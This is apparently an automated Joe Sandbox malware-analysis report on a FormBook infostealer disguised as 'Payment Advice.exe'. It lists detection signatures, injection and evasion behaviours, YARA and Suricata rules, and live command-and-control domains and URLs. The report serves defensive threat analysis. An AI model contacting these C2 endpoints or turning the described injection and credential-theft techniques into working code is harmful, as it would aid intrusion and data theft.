Edit tour

Windows Analysis Report
Payment Advice.exe

Overview

General Information

Sample name:	Payment Advice.exe
Analysis ID:	1500922
MD5:	2f66c56f11963a398518cee0dde2c123
SHA1:	f8bf7a9e597a3f6515b2c4f2692bd29964f68bef
SHA256:	360b32e7a4c150198ba6f01ca94a9f31a6f95ac8a00a87a453206cdbad727d94
Tags:	exe
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found direct / indirect Syscall (likely to bypass EDR)

Initial sample is a PE file and has a suspicious name

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

Payment Advice.exe (PID: 6240 cmdline: "C:\Users\user\Desktop\Payment Advice.exe" MD5: 2F66C56F11963A398518CEE0DDE2C123)

svchost.exe (PID: 3484 cmdline: "C:\Users\user\Desktop\Payment Advice.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

dBVLdSQhZzWNZhLripbAYBQQRtfM.exe (PID: 772 cmdline: "C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

clip.exe (PID: 5088 cmdline: "C:\Windows\SysWOW64\clip.exe" MD5: E40CB198EBCD20CD16739F670D4D7B74)

dBVLdSQhZzWNZhLripbAYBQQRtfM.exe (PID: 2840 cmdline: "C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 5780 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.4099874690.0000000002B00000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.4099874690.0000000002B00000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a990:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13eff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.4098771264.0000000002380000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.4098771264.0000000002380000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a990:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13eff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000001.00000002.1824764335.0000000000980000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.1824764335.0000000000980000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a990:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13eff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000001.00000002.1824537805.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.1824537805.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2db53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x170c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.4099046752.0000000002830000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.4099046752.0000000002830000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a990:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13eff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000001.00000002.1825289578.0000000005550000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.1825289578.0000000005550000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x1eb532:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1d4aa1:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.4099815703.0000000004C90000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.4099815703.0000000004C90000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x1eb532:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1d4aa1:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Click to see the 9 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
1.2.svchost.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2cd53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x162c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
1.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
1.2.svchost.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2db53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x170c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Payment Advice.exe", CommandLine: "C:\Users\user\Desktop\Payment Advice.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment Advice.exe", ParentImage: C:\Users\user\Desktop\Payment Advice.exe, ParentProcessId: 6240, ParentProcessName: Payment Advice.exe, ProcessCommandLine: "C:\Users\user\Desktop\Payment Advice.exe", ProcessId: 3484, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\Payment Advice.exe", CommandLine: "C:\Users\user\Desktop\Payment Advice.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment Advice.exe", ParentImage: C:\Users\user\Desktop\Payment Advice.exe, ParentProcessId: 6240, ParentProcessName: Payment Advice.exe, ProcessCommandLine: "C:\Users\user\Desktop\Payment Advice.exe", ProcessId: 3484, ProcessName: svchost.exe

Suricata Signatures

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 217.160.0.106

Timestamp:	2024-08-29T05:23:48.414122+0200
SID:	2855464
Severity:	1
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 43.252.167.188

Timestamp:	2024-08-29T05:24:43.163075+0200
SID:	2855464
Severity:	1
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 43.252.167.188

Timestamp:	2024-08-29T05:24:38.121245+0200
SID:	2855464
Severity:	1
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 199.192.19.19

Timestamp:	2024-08-29T05:25:44.679241+0200
SID:	2855464
Severity:	1
Source Port:	49760
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE FormBook CnC Checkin (GET) M5 - Source IP: 192.168.2.4 - Destination IP: 208.91.197.27

Timestamp:	2024-08-29T05:24:22.138364+0200
SID:	2050745
Severity:	1
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 91.195.240.19

Timestamp:	2024-08-29T05:26:09.127708+0200
SID:	2855464
Severity:	1
Source Port:	49767
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 43.252.167.188

Timestamp:	2024-08-29T05:24:40.613238+0200
SID:	2855464
Severity:	1
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 23.251.54.212

Timestamp:	2024-08-29T05:25:08.595090+0200
SID:	2855464
Severity:	1
Source Port:	49755
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 199.192.19.19

Timestamp:	2024-08-29T05:25:42.092821+0200
SID:	2855464
Severity:	1
Source Port:	49759
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 217.160.0.106

Timestamp:	2024-08-29T05:23:43.265145+0200
SID:	2855464
Severity:	1
Source Port:	49737
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 91.195.240.19

Timestamp:	2024-08-29T05:26:06.576245+0200
SID:	2855464
Severity:	1
Source Port:	49766
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE FormBook CnC Checkin (GET) M5 - Source IP: 192.168.2.4 - Destination IP: 213.145.228.16

Timestamp:	2024-08-29T05:26:00.793267+0200
SID:	2050745
Severity:	1
Source Port:	49765
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 172.67.210.102

Timestamp:	2024-08-29T05:26:33.892219+0200
SID:	2855464
Severity:	1
Source Port:	49772
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 172.67.210.102

Timestamp:	2024-08-29T05:26:31.345353+0200
SID:	2855464
Severity:	1
Source Port:	49771
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 23.251.54.212

Timestamp:	2024-08-29T05:25:06.049149+0200
SID:	2855464
Severity:	1
Source Port:	49754
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 91.195.240.19

Timestamp:	2024-08-29T05:26:11.764888+0200
SID:	2855464
Severity:	1
Source Port:	49768
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE FormBook CnC Checkin (GET) M5 - Source IP: 192.168.2.4 - Destination IP: 23.251.54.212

Timestamp:	2024-08-29T05:25:33.878707+0200
SID:	2050745
Severity:	1
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 213.145.228.16

Timestamp:	2024-08-29T05:25:53.110937+0200
SID:	2855464
Severity:	1
Source Port:	49762
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE FormBook CnC Checkin (GET) M5 - Source IP: 192.168.2.4 - Destination IP: 194.9.94.85

Timestamp:	2024-08-29T05:24:59.075679+0200
SID:	2050745
Severity:	1
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) M5 - Source IP: 192.168.2.4 - Destination IP: 172.67.210.102

Timestamp:	2024-08-29T05:22:50.860360+0200
SID:	2050745
Severity:	1
Source Port:	49773
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 208.91.197.27

Timestamp:	2024-08-29T05:24:12.959498+0200
SID:	2855464
Severity:	1
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 213.145.228.16

Timestamp:	2024-08-29T05:25:58.225015+0200
SID:	2855464
Severity:	1
Source Port:	49764
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 194.9.94.85

Timestamp:	2024-08-29T05:24:54.012938+0200
SID:	2855464
Severity:	1
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE FormBook CnC Checkin (GET) M5 - Source IP: 192.168.2.4 - Destination IP: 199.192.19.19

Timestamp:	2024-08-29T05:25:47.174973+0200
SID:	2050745
Severity:	1
Source Port:	49761
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 23.251.54.212

Timestamp:	2024-08-29T05:25:11.485739+0200
SID:	2855464
Severity:	1
Source Port:	49756
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 213.145.228.16

Timestamp:	2024-08-29T05:25:55.627828+0200
SID:	2855464
Severity:	1
Source Port:	49763
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 194.9.94.85

Timestamp:	2024-08-29T05:24:51.454905+0200
SID:	2855464
Severity:	1
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE FormBook CnC Checkin (GET) M5 - Source IP: 192.168.2.4 - Destination IP: 217.160.0.106

Timestamp:	2024-08-29T05:23:51.070221+0200
SID:	2050745
Severity:	1
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) M5 - Source IP: 192.168.2.4 - Destination IP: 43.252.167.188

Timestamp:	2024-08-29T05:24:45.696562+0200
SID:	2050745
Severity:	1
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 217.160.0.106

Timestamp:	2024-08-29T05:23:45.840976+0200
SID:	2855464
Severity:	1
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 172.67.210.102

Timestamp:	2024-08-29T05:26:28.818630+0200
SID:	2855464
Severity:	1
Source Port:	49770
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE FormBook CnC Checkin (GET) M5 - Source IP: 192.168.2.4 - Destination IP: 5.44.111.162

Timestamp:	2024-08-29T05:23:27.422081+0200
SID:	2050745
Severity:	1
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 194.9.94.85

Timestamp:	2024-08-29T05:24:56.557993+0200
SID:	2855464
Severity:	1
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 208.91.197.27

Timestamp:	2024-08-29T05:24:18.037065+0200
SID:	2855464
Severity:	1
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE FormBook CnC Checkin (GET) M5 - Source IP: 192.168.2.4 - Destination IP: 91.195.240.19

Timestamp:	2024-08-29T05:26:14.213515+0200
SID:	2050745
Severity:	1
Source Port:	49769
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 199.192.19.19

Timestamp:	2024-08-29T05:25:39.547107+0200
SID:	2855464
Severity:	1
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 208.91.197.27

Timestamp:	2024-08-29T05:24:15.496052+0200
SID:	2855464
Severity:	1
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://www.gipsytroya.com/tf44/?kbRxoVY0=zHiAY6EG+HxIxFu9b4tfleXF6yb9aKgM+W8Rr/tGfSzDPDxggLk9FyyADeImH3/ZYgS5WMd+vNhhyXlbnciywdLjC/RTAaKLEzmduXRfLlKkNxNmYFq4qCQ=&DnUL=_290s	Avira URL Cloud: Label: malware
Source: http://www.sandranoll.com/aroo/	Avira URL Cloud: Label: malware
Source: http://www.gipsytroya.com/tf44/	Avira URL Cloud: Label: malware
Source: http://www.sandranoll.com/aroo/?DnUL=_290s&kbRxoVY0=bKy7FSIHmKYFjPoOU8uZGqQpeblpEQl2twFEynhtde+XdOqoRjh1sl1n+ba+sSXyFBuEELqLWRHnTW9JDkHGH0ELwMgy3j7Qb0m6Rmga/hvJBmgScr7TS3s=	Avira URL Cloud: Label: malware
Source: http://www.xn--matfrmn-jxa4m.se/4hda/	Avira URL Cloud: Label: malware
Source: http://www.xn--matfrmn-jxa4m.se/4hda/?kbRxoVY0=+FYRabRorC7iiipdZ2F3S2JpD5gx1+4XHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG9+fjZ9jEj5Dze7n0KBNuQ8eKVrjet+eDbX/8=&DnUL=_290s	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: www.sandranoll.com	Virustotal: Detection: 10%	Perma Link
Source: www.anuts.top	Virustotal: Detection: 7%	Perma Link
Source: www.gipsytroya.com	Virustotal: Detection: 8%	Perma Link
Source: http://www.gipsytroya.com/tf44/	Virustotal: Detection: 7%	Perma Link

Multi AV Scanner detection for submitted file

Source: Payment Advice.exe	ReversingLabs: Detection: 15%
Source: Payment Advice.exe	Virustotal: Detection: 22%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4099874690.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4098771264.0000000002380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1824764335.0000000000980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1824537805.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4099046752.0000000002830000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1825289578.0000000005550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4099815703.0000000004C90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: Payment Advice.exe

Joe Sandbox ML: detected

Source: Payment Advice.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000002.00000000.1747131263.00000000002EE000.00000002.00000001.01000000.00000004.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000000.1898332089.00000000002EE000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: wntdll.pdbUGP source: Payment Advice.exe, 00000000.00000003.1638476468.0000000004280000.00000004.00001000.00020000.00000000.sdmp, Payment Advice.exe, 00000000.00000003.1638093637.00000000040E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1824961827.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1824961827.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1732271397.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1734028020.0000000003200000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4100101355.000000000466E000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1827343690.0000000004329000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1824562864.0000000004174000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4100101355.00000000044D0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Payment Advice.exe, 00000000.00000003.1638476468.0000000004280000.00000004.00001000.00020000.00000000.sdmp, Payment Advice.exe, 00000000.00000003.1638093637.00000000040E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1824961827.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1824961827.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1732271397.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1734028020.0000000003200000.00000004.00000020.00020000.00000000.sdmp, clip.exe, clip.exe, 00000003.00000002.4100101355.000000000466E000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1827343690.0000000004329000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1824562864.0000000004174000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4100101355.00000000044D0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: clip.pdb source: svchost.exe, 00000001.00000002.1824835569.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1792564169.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000002.00000002.4099450427.00000000011D8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: clip.exe, 00000003.00000002.4099123846.0000000002885000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4100415517.0000000004AFC000.00000004.10000000.00040000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000000.1898644443.00000000027CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2113945437.000000002475C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: clip.exe, 00000003.00000002.4099123846.0000000002885000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4100415517.0000000004AFC000.00000004.10000000.00040000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000000.1898644443.00000000027CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2113945437.000000002475C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: clip.pdbGCTL source: svchost.exe, 00000001.00000002.1824835569.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1792564169.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000002.00000002.4099450427.00000000011D8000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_005C6CA9 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_005C6CA9
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_005C60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	0_2_005C60DD
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_005C63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	0_2_005C63F9
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_005CEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_005CEB60
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_005CF56F FindFirstFileW,FindClose,	0_2_005CF56F
